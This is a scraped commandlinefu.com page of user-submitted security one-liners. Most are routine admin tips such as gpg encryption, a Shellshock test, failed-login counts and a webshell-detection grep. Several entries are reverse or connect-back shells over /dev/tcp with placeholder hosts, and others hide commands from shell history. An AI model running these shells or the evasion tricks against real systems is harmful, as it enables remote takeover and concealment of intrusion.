Hide

What's this?

commandlinefu.com is the place to record those command-line gems that you return to again and again.

Delete that bloated snippets file you've been using and share your personal repository with the world. That way others can gain from your CLI wisdom and you from theirs too. All commands can be commented on, discussed and voted up or down.


If you have a new feature suggestion or find a bug, please get in touch via http://commandlinefu.uservoice.com/

Get involved!

You can sign-in using OpenID credentials, or register a traditional username and password.

First-time OpenID users will be automatically assigned a username which can be changed after signing in.

Hide

Stay in the loop…

Follow the Tweets.

Every new command is wrapped in a tweet and posted to Twitter. Following the stream is a great way of staying abreast of the latest commands. For the more discerning, there are Twitter accounts for commands that get a minimum of 3 and 10 votes - that way only the great commands get tweeted.

» http://twitter.com/commandlinefu
» http://twitter.com/commandlinefu3
» http://twitter.com/commandlinefu10

Subscribe to the feeds.

Use your favourite RSS aggregator to stay in touch with the latest commands. There are feeds mirroring the 3 Twitter streams as well as for virtually every other subset (users, tags, functions,…):

Subscribe to the feed for:

Hide

News

2011-03-12 - Confoo 2011 presentation
Slides are available from the commandlinefu presentation at Confoo 2011: http://presentations.codeinthehole.com/confoo2011/
2011-01-04 - Moderation now required for new commands
To try and put and end to the spamming, new commands require moderation before they will appear on the site.
2010-12-27 - Apologies for not banning the trolls sooner
Have been away from the interwebs over Christmas. Will be more vigilant henceforth.
2010-09-24 - OAuth and pagination problems fixed
Apologies for the delay in getting Twitter's OAuth supported. Annoying pagination gremlin also fixed.
Hide

Tags

Hide

Functions

Commands tagged Security from sorted by
Terminal - Commands tagged Security - 42 results
x="() { :; }; echo x" bash -c :
2014-12-08 22:21:18
User: malathion
Functions: bash
Tags: Security bash
1

If this command prints 'x' then your shell is vulnerable. Null output confirms that you are protected. Further reading: http://allanmcrae.com/2014/09/shellshock-and-arch-linux/

export HISTCONTROL=ignorespace
2013-07-25 08:31:10
User: gorynka
Functions: export
2
<space>secret_command;export HISTCONTROL=

This will make "secret_command" not appear in "history" list.

for ii in $(find /path/to/docroot -type f -name \*.php); do echo $ii; wc -lc $ii | awk '{ nr=$2/($1 + 1); printf("%d\n",nr); }'; done
2013-04-05 19:06:17
Functions: awk echo find wc
0

I have found that base64 encoded webshells and the like contain lots of data but hardly any newlines due to the formatting of their payloads. Checking the "width" will not catch everything, but then again, this is a fuzzy problem that relies on broad generalizations and heuristics that are never going to be perfect.

What I have done is set an arbitrary threshold (200 for example) and compare the values that are produced by this script, only displaying those above the threshold. One webshell I tested this on scored 5000+ so I know it works for at least one piece of malware.

find ./public_html/ -name \*.php -exec grep -HRnDskip "\(passthru\|shell_exec\|system\|phpinfo\|base64_decode\|chmod\|mkdir\|fopen\|fclose\|readfile\) *(" {} \;
2013-04-03 12:42:19
User: lpanebr
Functions: find grep
0

Searched strings:

passthru, shell_exec, system, phpinfo, base64_decode, chmod, mkdir, fopen, fclose, readfile

Since some of the strings may occur in normal text or legitimately you will need to adjust the command or the entire regex to suit your needs.

tar zcf - foo | gpg -c --cipher-algo aes256 -o foo.tgz.gpg
2013-03-13 09:44:39
User: skkzsh
Functions: gpg tar
0

Decrypt with:

gpg -o- foo.tgz.gpg | tar zxvf -
read -p 'Script: ' S && C=$S.crypt H='eval "$((dd if=$0 bs=1 skip=//|gpg -d)2>/dev/null)"; exit;' && gpg -c<$S|cat >$C <(echo $H|sed s://:$(echo "$H"|wc -c):) - <(chmod +x $C)
2013-03-10 08:59:45
User: rodolfoap
Functions: cat chmod echo gpg read sed wc
7

(Please see sample output for usage)

Use any script name (the read command gets it) and it will be encrypted with the extension .crypt, i.e.:

myscript --> myscript.crypt

You can execute myscript.crypt only if you know the password. If you die, your script dies with you.

If you modify the startup line, be careful with the offset calculation of the crypted block (the XX string).

Not difficult to make script editable (an offset-dd piped to a gpg -d piped to a vim - piped to a gpg -c directed to script.new ), but not enough space to do it on a one liner.

Sorry for the chmod on parentheses, I dont like "-" at the end.

Thanks flatcap for the subshell abbreviation to /dev/null

echo "eval \"\$(dd if=\$0 bs=1 skip=XX 2>/dev/null|gpg -d 2>/dev/null)\"; exit" > script.secure; sed -i s:XX:$(stat -c%s script.secure): script.secure; gpg -c < script.bash >> script.secure; chmod +x script.secure
2013-03-09 11:16:48
User: rodolfoap
Functions: chmod echo gpg sed stat
6

(Please see sample output for usage)

script.bash is your script, which will be crypted to script.secure

script.bash --> script.secure

You can execute script.secure only if you know the password. If you die, your script dies with you.

If you modify the startup line, be careful with the offset calculation of the crypted block (the XX string).

Not difficult to make script editable (an offset-dd piped to a gpg -d piped to a vim - piped to a gpg -c directed to script.new ), but not enough space to do it on a one liner.

dd if=/dev/zero of=T bs=1024 count=10240;mkfs.ext3 -q T;E=$(echo 'read O;mount -o loop,offset=$O F /mnt;'|base64|tr -d '\n');echo "E=\$(echo $E|base64 -d);eval \$E;exit;">F;cat <(dd if=/dev/zero bs=$(echo 9191-$(stat -c%s F)|bc) count=1) <(cat T;rm T)>>F
2013-01-31 01:38:30
User: rodolfoap
5

This is just a proof of concept: A FILE WHICH CAN AUTOMOUNT ITSELF through a SIMPLY ENCODED script. It takes advantage of the OFFSET option of mount, and uses it as a password (see that 9191? just change it to something similar, around 9k). It works fine, mounts, gets modified, updated, and can be moved by just copying it.

USAGE: SEE SAMPLE OUTPUT

The file is composed of three parts:

a) The legible script (about 242 bytes)

b) A random text fill to reach the OFFSET size (equals PASSWORD minus 242)

c) The actual filesystem

Logically, (a)+(b) = PASSWORD, that means OFFSET, and mount uses that option.

PLEASE NOTE: THIS IS NOT AN ENCRYPTED FILESYSTEM. To improve it, it can be mounted with a better encryption script and used with encfs or cryptfs. The idea was just to test the concept... with one line :)

It applies the original idea of http://www.commandlinefu.com/commands/view/7382/command-for-john-cons for encrypting the file.

The embedded bash script can be grown, of course, and the offset recalculation goes fine. I have my own version with bash --init-file to startup a bashrc with a well-defined environment, aliases, variables.

exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
2012-11-16 02:48:01
User: somaddict
Functions: cat exec read
8

This is sneaky.

First, start a listening service on your box.

nc -l 8080 -vvv &

On the target you will create a new descriptor which is assigned to a network node. Then you will read and write to that descriptor.

exec 5<>/dev/tcp/<your_box>/8080;cat <&5 | while read line; do $line 2>&5 >&5; done

You can send it to the background like this:

(exec 5<>/dev/tcp/<your-box>/8080;cat <&5 | while read line; do $line 2>&5 >&5;) &

Now everything you type in our local listening server will get executed on the target and the output of the commands will be piped back to the client.

sudo lastb | awk '{if ($3 ~ /([[:digit:]]{1,3}\.){3}[[:digit:]]{1,3}/)a[$3] = a[$3]+1} END {for (i in a){print i " : " a[i]}}' | sort -nk 3
2012-09-11 14:51:10
User: sgowie
Functions: awk lastb sort sudo
1

The lastb command presents you with the history of failed login attempts (stored in /var/log/btmp). The reference file is read/write by root only by default. This can be quite an exhaustive list with lots of bots hammering away at your machine. Sometimes it is more important to see the scale of things, or in this case the volume of failed logins tied to each source IP.

The awk statement determines if the 3rd element is an IP address, and if so increments the running count of failed login attempts associated with it. When done it prints the IP and count.

The sort statement sorts numerically (-n) by column 3 (-k 3), so you can see the most aggressive sources of login attempts. Note that the ':' character is the 2nd column, and that the -n and -k can be combined to -nk.

Please be aware that the btmp file will contain every instance of a failed login unless explicitly rolled over. It should be safe to delete/archive this file after you've processed it.

echo -n 'the_password' | md5sum -
md5sum<<<'text to be encrypted'
2012-02-14 19:57:52
User: waldvogel
Functions: md5sum
1

Here Strings / A variant of here documents, the format is:

(from bash manpage)

gpg -c <filename>
2011-11-21 06:26:59
User: Dhinesh
Functions: gpg
Tags: Security
3

This will encrypt your single file and create a filename.gpg file.

Option: * -c : Encrypt with symmetric cipher

To decrypt

dhinesh@ubuntu:~$ gpg -c sample.rb.gpg

<space> secret -p password
2011-09-16 12:41:16
User: pcholt
0

Put a space in front of your command on the command line and it will not be logged as part of your command line history.

nmap -sT -PN -vv <target ip>
2011-07-22 02:37:19
User: Richie086
0

Change the IP address from 127.0.0.1 to the target machines ip address. Even if the target has ICMP (ping) blocked, it will show you what ports are open on the target. Very handy for situations where you know the target is up and online but wont respond to pings.

gswin32c -dSAFER -dBATCH -dNOPAUSE -sDEVICE=pdfwrite -sFONTPATH=%windir%/fonts;xfonts;. -sPDFPassword= -dPDFSETTINGS=/prepress -dPassThroughJPEGImages=true -sOutputFile=OUTPUT.pdf INPUT.pdf
openssl s_client -connect localhost:443 -ssl2
bash -i >& /dev/tcp/IP/PORT 0>&1
sitepass2() {salt="this_salt";pass=`echo -n "$@"`;for i in {1..500};do pass=`echo -n $pass$salt|sha512sum`;done;echo$pass|gzip -|strings -n 1|tr -d "[:space:]"|tr -s '[:print:]' |tr '!-~' 'P-~!-O'|rev|cut -b 2-15;history -d $(($HISTCMD-1));}
2010-12-09 08:42:24
User: Soubsoub
Functions: cut gzip strings tr
Tags: Security
-4

This is a safest variation for "sitepass function" that includes a SALT over a long loop for sha512sum hash

sudo -K
2010-10-05 12:44:26
User: b_t
Functions: sudo
17

By default sudo 'remembers' password for a few minutes, so that you do not need to re-enter password for a series of sudo commands that might follow within a short time duration.

However, sometime you might want sudo to instantly 'forget' the password.

(Next sudo command will need you to reenter the password)

Credit: I first learned this while listening to one of the 'tuxradar' podcast.

echo 'K5B!C%@NC[4\CMK54(C^)7PP)7}$RVPNE-FGNAQNEQ-NAGVIVEHF-GRFG-SVYR!$U+U*' | tr '[A-Za-z]' '[N-ZA-Mn-za-m]' > /tmp/eicar.com
2010-08-13 21:39:35
User: cyberscribe
Functions: echo tr
1

Test whether real-time virus detection is working by running this command and checking for eicar.com in /tmp. Requires real-time scanning to be enabled and active on the /tmp directory. If scanning is active, the file should be quarantined/deleted (depending on your settings) moments after running this command. If not, the (harmless) test file should remain in your /tmp directory.

truecrypt volume.tc
2010-04-14 18:34:09
User: rkulla
2

This should automatically mount it to /media/truecrypt1. Further mounts will go to /media/truecrypt2, and so on. You shouldn't need sudo/su if your permissions are right.

I alias tru='truecrypt' since tr and true are commands.

To explicitly create a mount point do: tru volume.tc /media/foo

To make sure an GUI explorer window (nautilus, et al) opens on the mounted volume, add: --explorer

To see what you currently have mounted do: tru -l

To dismount a volume do: tru -d volume.tc. To dismount all mounted volumes at once do: tru -d

Tested with Truecrypt v6.3a / Ubuntu 9.10

exec 0</dev/tcp/hostname/port; exec 1>&0; exec 2>&0; exec /bin/sh 0</dev/tcp/hostname/port 1>&0 2>&0
2010-03-18 17:25:08
User: truemilk
Functions: exec
2

Connect-back shell using Bash built-ins. Useful in a web app penetration test, if it's the case of a locked down environment, without the need for file uploads or a writable directory.

--

/dev/tcp and /dev/udb redirects must be enabled at compile time in Bash.

Most Linux distros enable this feature by default but at least Debian is known to disable it.

--

http://labs.neohapsis.com/2008/04/17/connect-back-shell-literally/

security unlock-keychain; security find-generic-password -ga "/Users/mruser/.ssh/id_dsa" 2>&1 > /dev/null
2010-02-02 21:14:57
-1

This must be run the first time while logged into your Mac desktop, as it will graphically prompt for access permissions. Subsequent uses will not prompt, assuming you select "Always allow".